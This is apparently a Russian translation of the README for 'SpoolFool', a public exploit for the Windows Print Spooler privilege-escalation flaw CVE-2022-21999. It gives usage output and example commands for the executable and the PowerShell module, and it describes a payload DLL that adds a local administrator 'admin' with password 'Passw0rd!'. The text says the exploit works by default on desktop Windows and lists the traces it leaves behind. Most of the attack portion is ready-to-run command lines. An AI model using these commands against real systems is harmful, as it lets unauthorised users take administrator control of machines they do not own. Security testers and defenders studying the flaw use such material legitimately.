
Эксплойт для CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)
Эксплойт для CVE-2022-21999 - уязвимость повышения привилегий в Windows Print Spooler (LPE)
Предоставленный эксплойт должен работать по умолчанию на всех версиях Windows для настольных ПК.
Полные технические сведения см. в статье в блоге здесь.
PS C:\SpoolFool> .\SpoolFool.exe
SpoolFool
By Oliver Lyak (@ly4k_)
Examples:
C:\SpoolFool\SpoolFool.exe -dll add_user.dll
C:\SpoolFool\SpoolFool.exe -dll add_user.dll -printer 'My Printer'
C:\SpoolFool\SpoolFool.exe -dll add_user.dll -dir 'SECRET'
C:\SpoolFool\SpoolFool.exe -dll add_user.dll -printer 'My Printer' -dir 'SECRET'
PS C:\SpoolFool> ipmo .\SpoolFool.ps1
PS C:\SpoolFool> Invoke-SpoolFool
SpoolFool
By Oliver Lyak (@ly4k_)
Examples:
-dll add_user.dll
-dll add_user.dll -printer 'My Printer'
-dll add_user.dll -dir 'SECRET'
-dll add_user.dll -printer 'My Printer' -dir 'SECRET'
Следующий PoC использует DLL, которая создает нового локального администратора admin / Passw0rd!. DLL (AddUser.dll) и исходный код можно найти в этом репозитории.

Второй запуск
Следующий PoC демонстрирует второй запуск предоставленного эксплойта. Обратите внимание, что на этот раз уязвимость не используется для загрузки DLL.

После выполнения эксплойта остаются следующие артефакты для последующей очистки:
SpoolDirectory целевого принтера не восстанавливается